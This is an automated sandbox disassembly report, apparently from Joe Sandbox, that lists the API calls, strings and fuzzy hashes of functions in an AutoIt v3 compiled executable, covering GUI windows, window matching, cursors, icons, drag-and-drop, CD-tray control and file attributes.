VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464548
_wcscat.LIBCMT ref: 00464591
_wcscat.LIBCMT ref: 00464598
_wcsncpy.LIBCMT ref: 004645C3

Strings

04090000, xrefs: 0046457E
%u.%u.%u.%u, xrefs: 00464626
StringFileInfo\, xrefs: 0046451B
\VarFileInfo\Translation, xrefs: 00464540
DefaultLangCodepage, xrefs: 004645AB

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
API String ID: 699586101-1459072770
Opcode ID: 60d8f0236dceb86cc4fe81d47a0c18702099690fb3891d08ba0090958bb9e406
Instruction ID: 2b480a1fb6a64e9c247c6b56b60e40bdc72f3d5a191167641815a527c939035c
Opcode Fuzzy Hash: 60d8f0236dceb86cc4fe81d47a0c18702099690fb3891d08ba0090958bb9e406
Instruction Fuzzy Hash: 7641D431A002107BDB14BA75AC43FBF77ACDF81714F50046FF905A6182FA7C9A4296AE

Function 004027D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028BC
GetSystemMetrics.USER32(00000007), ref: 004028C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004028EF
GetSystemMetrics.USER32(00000008), ref: 004028F7
GetSystemMetrics.USER32(00000004), ref: 0040291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00402939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00402949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0040297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00402990
GetClientRect.USER32(00000000,000000FF), ref: 004029AE
GetStockObject.GDI32(00000011), ref: 004029CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 004029D5

Part of subcall function 00402344: GetCursorPos.USER32(?), ref: 00402357
Part of subcall function 00402344: ScreenToClient.USER32(004C57B0,?), ref: 00402374
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000001), ref: 00402399
Part of subcall function 00402344: GetAsyncKeyState.USER32(00000002), ref: 004023A7

SetTimer.USER32(00000000,00000000,00000028,00401256), ref: 004029FC

Strings

AutoIt v3 GUI, xrefs: 00402974

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
Instruction ID: a18fd751d40b92a0f9ce74f9a4650c687106778ef47aaf7a4e9f1722fdb5861d
Opcode Fuzzy Hash: df8829e052d7c40840cee99ca6260df0de385842cec2d42fdc9bfdfb12db4f5c
Instruction Fuzzy Hash: 8AB15075600209EFDB14EFA8DD49BAE77B4FB08314F10463AFA15A62D0DB78A851CB58

Function 0045A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 0045A47A
__swprintf.LIBCMT ref: 0045A51B
_wcscmp.LIBCMT ref: 0045A52E
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0045A583
_wcscmp.LIBCMT ref: 0045A5BF
GetClassNameW.USER32(?,?,00000400), ref: 0045A5F6
GetDlgCtrlID.USER32(?), ref: 0045A648
GetWindowRect.USER32(?,?), ref: 0045A67E
GetParent.USER32(?), ref: 0045A69C
ScreenToClient.USER32(00000000), ref: 0045A6A3
GetClassNameW.USER32(?,?,00000100), ref: 0045A71D
_wcscmp.LIBCMT ref: 0045A731
GetWindowTextW.USER32(?,?,00000400), ref: 0045A757
_wcscmp.LIBCMT ref: 0045A76B

Part of subcall function 0042362C: _iswctype.LIBCMT ref: 00423634

Strings

%s%u, xrefs: 0045A515

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
String ID: %s%u
API String ID: 3744389584-679674701
Opcode ID: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
Instruction ID: eb4c2c17bfd361fdb29ac4d9e78bc58de04dd0089fb3858937583b9ed20721cb
Opcode Fuzzy Hash: 70582c53a74fb19ef89f66ee8ee48de01d33c33058aefc90aeee9439ab50311f
Instruction Fuzzy Hash: 06A1B431204606BFD714DF60C884BABB7E8FF44316F04462AFD99D2251D738E969CB9A

Function 0045AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(00000008,?,00000400), ref: 0045AF18
_wcscmp.LIBCMT ref: 0045AF29
GetWindowTextW.USER32(00000001,?,00000400), ref: 0045AF51
CharUpperBuffW.USER32(?,00000000), ref: 0045AF6E
_wcscmp.LIBCMT ref: 0045AF8C
_wcsstr.LIBCMT ref: 0045AF9D
GetClassNameW.USER32(00000018,?,00000400), ref: 0045AFD5
_wcscmp.LIBCMT ref: 0045AFE5
GetWindowTextW.USER32(00000002,?,00000400), ref: 0045B00C
GetClassNameW.USER32(00000018,?,00000400), ref: 0045B055
_wcscmp.LIBCMT ref: 0045B065
GetClassNameW.USER32(00000010,?,00000400), ref: 0045B08D
GetWindowRect.USER32(00000004,?), ref: 0045B0F6

Strings

ThumbnailClass, xrefs: 0045AFE0, 0045B060
@, xrefs: 0045AEF9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
String ID: @$ThumbnailClass
API String ID: 1788623398-1539354611
Opcode ID: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
Instruction ID: 2113ca19c953e4d0fb0a3bed3b629d6a09082ecb25fab152276a3acc7fd757eb
Opcode Fuzzy Hash: 020363660ca7d71f34756f1623f4acd369a1d6cd1f29e6ae8ac33c2e96e31edf
Instruction Fuzzy Hash: BD81CF711082059BDB00DF11C881BAB77E8EF4075AF14856FFD859A192DB38DD4DCBAA

Function 0048C5FE Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623

DragQueryPoint.SHELL32(?,?), ref: 0048C627

Part of subcall function 0048AB37: ClientToScreen.USER32(?,?), ref: 0048AB60
Part of subcall function 0048AB37: GetWindowRect.USER32(?,?), ref: 0048ABD6
Part of subcall function 0048AB37: PtInRect.USER32(?,?,0048C014), ref: 0048ABE6

SendMessageW.USER32(?,000000B0,?,?), ref: 0048C690
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0048C69B
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0048C6BE
_wcscat.LIBCMT ref: 0048C6EE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 0048C705
SendMessageW.USER32(?,000000B0,?,?), ref: 0048C71E
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C735
SendMessageW.USER32(?,000000B1,?,?), ref: 0048C757
DragFinish.SHELL32(?), ref: 0048C75E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0048C851

Strings

pbL, xrefs: 0048C79B
@GUI_DRAGFILE, xrefs: 0048C800
@GUI_DROPID, xrefs: 0048C77E
@GUI_DRAGID, xrefs: 0048C7C9

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$pbL
API String ID: 169749273-3863044002
Opcode ID: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
Instruction ID: 4fadb8ae9d86136d60326728fb0320be203031e120dd753c2ba31efb77555f42
Opcode Fuzzy Hash: ff19a083962564101d0b0bee14167f2d37b8cd78877080f1dcf00369c6d7ebf7
Instruction Fuzzy Hash: 1B617F71108300AFC701EF65CC85D9FBBE8EF88714F50092EF591A22A1DB74A949CB6A

Function 0045ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 0045AC33

Strings

[ACTIVE, xrefs: 0045AC20
[ALL, xrefs: 0045ACD9
[HANDLE:, xrefs: 0045AC3F
[LAST, xrefs: 0045ACE0
ACTIVE, xrefs: 0045AC0E
CLASSNAME=, xrefs: 0045AC70
[REGEXPTITLE:, xrefs: 0045AC5B
ALL, xrefs: 0045ACC7
LAST, xrefs: 0045ABF8
REGEXP=, xrefs: 0045AC48
[CLASS:, xrefs: 0045AC83
HANDLE=, xrefs: 0045AC2C

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: __wcsnicmp
String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
API String ID: 1038674560-1810252412
Opcode ID: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction ID: cc55e2bc6580523fe6938d14c256d65c14dee3a36fa7a852f9c3cef8ae364549
Opcode Fuzzy Hash: 52f89f39c4f5c5e735f1cd86a92d30baad3c4cbecdefe61fa6aede404be9d37c
Instruction Fuzzy Hash: 2C31A370A48209AADB01EA61DE43FEE7774AF14719F60052FB801711D2EB6D6F18C56E

Function 00474FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F8A), ref: 00475013
LoadCursorW.USER32(00000000,00007F00), ref: 0047501E
LoadCursorW.USER32(00000000,00007F03), ref: 00475029
LoadCursorW.USER32(00000000,00007F8B), ref: 00475034
LoadCursorW.USER32(00000000,00007F01), ref: 0047503F
LoadCursorW.USER32(00000000,00007F81), ref: 0047504A
LoadCursorW.USER32(00000000,00007F88), ref: 00475055
LoadCursorW.USER32(00000000,00007F80), ref: 00475060
LoadCursorW.USER32(00000000,00007F86), ref: 0047506B
LoadCursorW.USER32(00000000,00007F83), ref: 00475076
LoadCursorW.USER32(00000000,00007F85), ref: 00475081
LoadCursorW.USER32(00000000,00007F82), ref: 0047508C
LoadCursorW.USER32(00000000,00007F84), ref: 00475097
LoadCursorW.USER32(00000000,00007F04), ref: 004750A2
LoadCursorW.USER32(00000000,00007F02), ref: 004750AD
LoadCursorW.USER32(00000000,00007F89), ref: 004750B8
GetCursorInfo.USER32(?), ref: 004750C8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Cursor$Load$Info
String ID:
API String ID: 2577412497-0
Opcode ID: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction ID: d5c7a2001707235dd9e126089dd3671015cbda4ea0a9ffae781a460d29ca5a6d
Opcode Fuzzy Hash: fe88967af424c1f4c9ae994d1dca842c12f2ee5cef9159fe2d10a3b622c76547
Instruction Fuzzy Hash: 7F3114B1D083196ADF109FB68C8999FBFE8FF04750F50453BA50DEB281DA7865048F95

Function 0048A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0048A259
DestroyWindow.USER32(?,?), ref: 0048A2D3

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0048A34D
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0048A36F
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A382
DestroyWindow.USER32(00000000), ref: 0048A3A4
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0048A3DB
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0048A3F4
GetDesktopWindow.USER32 ref: 0048A40D
GetWindowRect.USER32(00000000), ref: 0048A414
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0048A42C
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0048A444

Part of subcall function 004025DB: GetWindowLongW.USER32(?,000000EB), ref: 004025EC

Strings

tooltips_class32, xrefs: 0048A346, 0048A3D4
0, xrefs: 0048A26F

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
String ID: 0$tooltips_class32
API String ID: 1297703922-3619404913
Opcode ID: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction ID: 021702ee8d535e162beb7c83f4b22bae82635ac61efe1e234d944cc96a30802f
Opcode Fuzzy Hash: ad7f984ea1cd4845daa69472354c2a8f15b860bce95c98789d10b07fca09f9c0
Instruction Fuzzy Hash: CE719270141204AFE721DF18CC49F6B77E5FB88704F04492EF985972A0D7B8E956CB6A

Function 00484392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00484424
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0048446F

Strings

SELECT, xrefs: 00484620
COLLAPSE, xrefs: 004844B5
GETSELECTED, xrefs: 0048457F
EXISTS, xrefs: 004844D8
GETITEMCOUNT, xrefs: 00484551
CHECK, xrefs: 0048448F
UNCHECK, xrefs: 0048464B
ISCHECKED, xrefs: 004845F2
GETTEXT, xrefs: 004845C2
EXPAND, xrefs: 00484521
GETTOTALCOUNT, xrefs: 00484456

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: BuffCharMessageSendUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 3974292440-4258414348
Opcode ID: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction ID: 284482c989e2c3ea33895925bad2fd62e2b6eb619b8524f2c72ddc2562c3458e
Opcode Fuzzy Hash: 8551f69f223e5bdeac0c783f2c4a73df6d5f98841a83c573d89b7fb24d6da8d4
Instruction Fuzzy Hash: BF917F712043119BCB04FF11C451A6EB7E1AF95358F44886EF8966B3A3DB38ED0ACB59

Function 0048B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0048B8B4
LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,004891C2), ref: 0048B910
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B949
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0048B98C
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0048B9C3
FreeLibrary.KERNEL32(?), ref: 0048B9CF
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0048B9DF
DestroyIcon.USER32(?,?,?,?,?,004891C2), ref: 0048B9EE
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0048BA0B
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0048BA17

Part of subcall function 00422EFD: __wcsicmp_l.LIBCMT ref: 00422F86

Strings

.icl, xrefs: 0048B82A
.dll, xrefs: 0048B86D
.exe, xrefs: 0048B84A

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 1212759294-1154884017
Opcode ID: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
Instruction ID: 50163288b7a3e5e0cbad55d9f7afdff750af503695f4b02481751edd59ee4b0a
Opcode Fuzzy Hash: 2fc131844969b4b5c283f9404ec8a9d49153947123385b136b1911b68efed916
Instruction Fuzzy Hash: CC61F2B1900215BEEB14EF65DC41FBF7BA8FB08710F10491AF915D62C1DBB8A984DBA4

Function 0046A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC

CharLowerBuffW.USER32(?,?), ref: 0046A3CB
GetDriveTypeW.KERNEL32 ref: 0046A418
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A460
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A497
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0046A4C5

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Strings

wait, xrefs: 0046A482
open, xrefs: 0046A3F2
close cd wait, xrefs: 0046A4B0
set cd door , xrefs: 0046A466
type cdaudio alias cd wait, xrefs: 0046A443
close, xrefs: 0046A3D1
open , xrefs: 0046A427
closed, xrefs: 0046A3DF, 0046A3E8

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
Instruction ID: 3713139b98a23bb0435d921a878e050fdb512fde8566727adc807e41ed5eba46
Opcode Fuzzy Hash: 7219c61cc9b188b714514c11cc18a48e6f3d8230eed7d6a51d534ace4fdd7166
Instruction Fuzzy Hash: F7515EB15146049FC700EF11C88196BB7E8EF94718F10886EF89967292DB39ED0ACF5A

Function 0046D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 0046DA10
_wcscat.LIBCMT ref: 0046DA28
_wcscat.LIBCMT ref: 0046DA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0046DA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 0046DA63
GetFileAttributesW.KERNEL32(?), ref: 0046DA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 0046DA95
SetCurrentDirectoryW.KERNEL32(?), ref: 0046DAA7

Strings

*.*, xrefs: 0046DAE6

Memory Dump Source

Source File: 00000000.00000002.1406743218.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1406696342.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1406908914.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407048855.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407156357.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407281714.0000000000527000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1407378770.000000000052E000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_I3LPkQh2an.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: fa1f45a871fde2c366193a2ba591cd779a7d7abb513180d0bc3df0c630a8fc5b
